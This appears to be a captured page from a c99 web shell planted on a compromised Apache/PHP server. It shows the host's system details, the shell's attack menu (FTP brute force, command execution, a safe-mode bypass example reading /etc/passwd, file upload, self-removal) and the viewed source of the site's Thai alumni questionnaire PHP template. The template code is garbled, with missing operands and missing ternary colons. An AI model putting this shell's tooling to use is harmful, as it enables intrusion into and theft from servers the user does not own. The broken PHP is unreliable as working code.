!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showAnsQn.php (14.02 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<SCRIPT language=JavaScript type="text/JavaScript">
function checkAns(state) {
    var stateVal = state.value;

    // 1 : ทำงานก่อนมาเรียน
    // 2 : มีงานทำ
    // 3 : ศึกษาต่อ

    if(stateVal=='2') {
        document.getElementById("w_1").style.display = "";
        document.getElementById("w_2").style.display = "";
        document.getElementById("w_3").style.display = "";
        document.getElementById("w_4").style.display = "";
        document.getElementById("w_5").style.display = "";
        document.getElementById("w_6").style.display = "";
        document.getElementById("w_7").style.display = "";
    } else {
        document.getElementById("w_1").style.display = "none";
        document.getElementById("w_2").style.display = "none";
        document.getElementById("w_3").style.display = "none";
        document.getElementById("w_4").style.display = "none";
        document.getElementById("w_5").style.display = "none";
        document.getElementById("w_6").style.display = "none";
        document.getElementById("w_7").style.display = "none";
    }

    if(stateVal=='3') {
        document.getElementById("e_1").style.display = "";
        document.getElementById("e_2").style.display = "";
        document.getElementById("e_3").style.display = "";
    } else {
        document.getElementById("e_1").style.display = "none";
        document.getElementById("e_2").style.display = "none";
        document.getElementById("e_3").style.display = "none";
    }
}
</SCRIPT>
<?php
$row_aq 
= (isset($qu_aq) && $qu_aq!=NULL) ? $qu_aq->row() : NULL;
$row_am = (isset($qu_am) && $qu_am!=NULL) ? $qu_am->row() : NULL;
$row_curd = (isset($qu_curd) && $qu_curd!=NULL) ? $qu_curd->row() : NULL;
$row_aq = (isset($qu_aq) && $qu_aq!=NULL) ? $qu_aq->row() : NULL;

// ---- ตอบแบบสอบถาม
$row_ansQn = (isset($ansQn) && $ansQn!=NULL) ? $ansQn->row() : NULL;
$row_ansQn_work = (isset($ansQn_work) && $ansQn_work!=NULL) ? $ansQn_work->row() : NULL;

// ---- create variable
$chkPreAdmit = (setValue('preAdmitPositionId',$row_ansQn)==|| setValue('preAdmitPositionId',$row_ansQn)==|| setValue('preAdmitPositionId',$row_am)==|| setValue('preAdmitPositionId',$row_am)==3);
?>
<table width="100%">
    <tr>
        <td align="center"><span class="h error">แบบสอบถามข้อมูลการทำงานของผู้สำเร็จการศึกษา</span></td>
    </tr>
    <tr>
        <td><br /></td>
    </tr>
    <tr>
        <td><?php echo form_open($this->config->item("ea_folder")."add_ansqn/process_ansQn", array("name" => "myform""id" => "myform"));?><table class="szone">
<?php
            
if($this->session->flashdata('stateFlg')) {
?>
            <tr>
                <td colspan="4" align="center"><?php echo $this->session->flashdata('stateFlg');?></td>
            </tr>
<?php
            
}
?>
            <!-- <tr>
                <td colspan="4" align="right">พิมพ์แบบสอบถาม
                <img src="<?php echo base_url().$this->config->item("rg_print");?>" title="พิมพ์" /></td>
            </tr> -->
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="indent coltd_szone" colspan="4"><span class="error"><b>ส่วนที่ 1 : ข้อมูลผู้สำเร็จการศึกษา</b></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">ชื่อ - สกุลผู้สำเร็จการศึกษา</td>
                <td><?php echo setValue('prefixName',$row_am).setValue('studentName',$row_am).' '.setValue('studentSurname',$row_am);?></td>
                <td class="coltd_szone">GPA</td>
                <td><?php echo number_format(setValue('GPA',$row_am),2);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">หลักสูตร</td>
                <td><?php echo setValue('curName',$row_curd);?></td>
                <td class="coltd_szone">ระดับการศึกษา</td>
                <td><?php echo setValue('levelName',$row_curd);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">ปีที่เข้า</td>
                <td><?php echo setValue('admitAcadYear',$row_am);?></td>
                <td class="coltd_szone">ปี่ที่สำเร็จการศึกษา</td>
                <td><?php echo setValue('graduateYear',$row_am);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">อีเมล์</td>
                <td><?php echo (setValue('studentEmail',$row_am)==NULL || setValue('studentEmail',$row_am)=="NULL") ? '-' setValue('studentEmail',$row_am);?></td>
                <td class="coltd_szone">เบอร์โทรศัพท์</td>
                <td><?php echo (setValue('currentPhoneNo',$row_am)==NULL ||setValue('currentPhoneNo',$row_am)=="") ? '-' setValue('currentPhoneNo',$row_am);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td height="25px" colspan="4"><br /></td>
            </tr>


            
            <!-- ###################################### 0 ####################################### -->
            
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="indent" height="25px" colspan="4"><span class="error"><b>ส่วนที่ 2 : ข้อมูลหลังสำเร็จการศึกษา</b></span> (เฉพาะผู้สำเร็จการศึกษาที่มีสถานะก่อนเข้าเรียนเป็น บุคคลทั่วไป ลูกจ้างชั่วคราว อสม. และบุตรอสม.)</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><input type="radio" name="state" id="state" value="1" <?php echo ($chkPreAdmit) ? "checked disabled" "disabled";?> /> ทำงานก่อนมาเรียน</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4">
                <input type="radio" name="state" id="state" value="2" onClick="checkAnsType(this)" <?php echo (setValue('aqStateQn',$row_ansQn)==2) ? "checked disabled" "disabled";?> /> มีงานทำ</td>
            </tr>

            <!-- ###################################### 1 ####################################### -->
            <!-- show infowork -->
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_1" style="display:''">
                <td class="coltd_szone indentPm">สถานะการทำงาน</td>
                <td><?php echo (setValue('aqWorkStatus',$row_ansQn)!="") ? ((setValue('aqWorkStatus',$row_ansQn)=="Y") ? "ตรงวิชาชีพ" "อาชีพอิสระ") : "-";?></td>
                <td class="coltd_szone">วันที่เริ่มทำงาน</td>
                <td><?php echo (setValue('aqWorkStartDate',$row_ansQn)=="0000-00-00" || setValue('aqWorkStartDate',$row_ansQn)=="") ? "-" abbreDate2(setValue('aqWorkStartDate',$row_ansQn));?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_2" style="display:''">
                <td class="coltd_szone indentPm">ตำแหน่งในหน่วยงาน</td>
                <td colspan="3"><?php echo (setValue('aqWorkPosition',$row_ansQn)!="") ? setValue('aqWorkPosition',$row_ansQn) : "-";?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_3" style="display:''">
                <td class="coltd_szone indentPm">อัตราเงินเดือน</td>
                <td><?php echo (setValue('aqWorkSalary',$row_ansQn)!="") ? number_format(setValue('aqWorkSalary',$row_ansQn),2) : "-";?> บาท/เดือน</td>
                <td class="coltd_szone">อัตราเงินพิเศษ</td>
                <td><?php echo (setValue('aqWorkSalarySpe',$row_ansQn)!="") ? number_format(setValue('aqWorkSalarySpe',$row_ansQn),2) : "-";?> บาท/เดือน
                <br />(เงินทำงานล่วงเวลา, เงิน พตส., เงินค่าประกอบวิชาชีพ, ค่าเวรบ่าย-ดึก)</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_4" style="display:''">
                <td class="coltd_szone indentPm">ชื่อหน่วยงาน ภาษาไทย</td>
                <td><?php echo (setValue('aqWorkCompanyT',$row_ansQn)!="") ? setValue('aqWorkCompanyT',$row_ansQn) : "-";?></td>
                <td class="coltd_szone">ชื่อหน่วยงาน ภาษาอังกฤษ</td>
                <td><?php echo (setValue('aqWorkCompanyE',$row_ansQn)!="") ? setValue('aqWorkCompanyE',$row_ansQn) : "-";?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_5" style="display:''">
                <td class="coltd_szone indentPm">ที่อยู่ของหน่วยงาน</td>
                <td><?php echo (setValue('aqWorkAddress',$row_ansQn)!="") ? setValue('aqWorkAddress',$row_ansQn) : "-";?></td>
                <td class="coltd_szone">ตำบล</td>
                <td><?php echo (setValue('districtName',$row_ansQn_work)!="") ? setValue('districtName',$row_ansQn_work) : "-";?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_6" style="display:''">
                <td class="coltd_szone indentPm">อำเภอ</td>
                <td><?php echo (setValue('amphurName',$row_ansQn_work)!="") ? setValue('amphurName',$row_ansQn_work) : "-";?></td>
                <td class="coltd_szone">จังหวัด</td>
                <td><?php echo (setValue('provinceName',$row_ansQn_work)!="") ? setValue('provinceName',$row_ansQn_work) : "-";?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_7" style="display:''">
                <td class="coltd_szone indentPm">รหัสไปรษณีย์</td>
                <td><?php echo (setValue('aqWorkZipcode',$row_ansQn)!="0") ? setValue('aqWorkZipcode',$row_ansQn) : "-";?></td>
                <td class="coltd_szone">เบอร์โทรศัพท์</td>
                <td><?php echo (setValue('aqWorkTelephone',$row_ansQn)!="") ? setValue('aqWorkTelephone',$row_ansQn) : "-";?></td>
            <!-- end infowork -->

            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4">
                <input type="radio" name="state" id="state" value="3" onClick="checkAnsType(this)" <?php echo setValue('aqStateQn',$row_ansQn)=="checked disabled" "disabled";?> /> ศึกษาต่อ
                </td>
            </tr>

            <!-- ###################################### 2 ####################################### -->
            <!-- show infoedu -->
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="e_1" style="display:''">
                <td class="coltd_szone indentPm">ชื่อปริญญา</td>
                <td><?php echo (setValue('aqDegree',$row_ansQn)=="") ? "-" setValue('aqDegree',$row_ansQn);?></td>
                <td class="coltd_szone">วันที่เริ่มต้นการศึกษา</td>
                <td><?php echo (setValue('aqEduStartDate',$row_ansQn)=="0000-00-00" || setValue('aqEduStartDate',$row_ansQn)=="") ? "-" abbreDate2(setValue('aqEduStartDate',$row_ansQn));?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="e_2" style="display:''">
                <td class="coltd_szone indentPm">สาขาวิชา (คณะ/วิทยาลัย)</td>
                <td><?php echo (setValue('aqMajId',$row_ansQn)=="0" || setValue('aqMajId',$row_ansQn)=="") ? "-" setValue('majoreduName',$row_ansQn);?></td>
                <td class="coltd_szone">ระดับการศึกษา</td>
                <td><?php echo (setValue('aqLevelId',$row_ansQn)=="0" || setValue('aqLevelId',$row_ansQn)=="") ? "-" setValue('leveleduName',$row_ansQn);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="e_3" style="display:''">
                <td class="coltd_szone indentPm">สถาบันการศึกษา</td>
                <td colspan="3"><?php echo (setValue('aqEduId',$row_ansQn)=="0" || setValue('aqEduId',$row_ansQn)=="") ? "-" setValue('educationName',$row_ansQn);?></td>
            </tr>
            <!-- end infoedu -->

            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td height="25px" colspan="4"><br /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="indent" height="25px" colspan="4"><span class="error"><b>ส่วนที่ 3 : การเข้าร่วมพิธีพระราชทานประกาศนียบัตร</b></span></td>
            </tr>
<?php
            
// preAdmitPositionId = 2 : ข้าราชการ, = 3 : ลูกจ้างประจำ
            
if(setValue('amAnsQn',$row_am)=="N" && (setValue('preAdmitPositionId',$row_am)==|| setValue('preAdmitPositionId',$row_am)==3)) {
?>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td colspan="4" class="indent"><input type="radio" name="investiture" id="investiture" value="Y" <?php echo set_value('investiture')=="Y" "checked" "";?> /> <b>เข้าร่วม</b>
                <input type="radio" name="investiture" id="investiture" value="N" <?php echo set_value('investiture')=="N" "checked" "";?> /> <b>ไม่เข้าร่วม</b>
                <?php echo form_error('investiture');?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td colspan="4" align="center">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="hidden" name="alumniId" id="alumniId" value="<?php echo $alumniId;?>" />
                <input type="hidden" name="preAdmit" id="preAdmit" value="<?php echo setValue('preAdmitPositionId',$row_am);?>" />
                </td>
            </tr>
<?php
            
} else {
?>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td colspan="4" class="coltd_szone"><input type="radio" name="investiture" id="investiture" value="Y" <?php echo setValue('aqInvestiture',$row_ansQn)=="Y" "checked disabled" "disabled";?> /> เข้าร่วม
                <input type="radio" name="investiture" id="investiture" value="N" <?php echo setValue('aqInvestiture',$row_ansQn)=="N" "checked disabled" "disabled";?> /> ไม่เข้าร่วม</td>
            </tr>
<?php
            
}
?>
        </table><?php echo form_close();?></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0092 ]--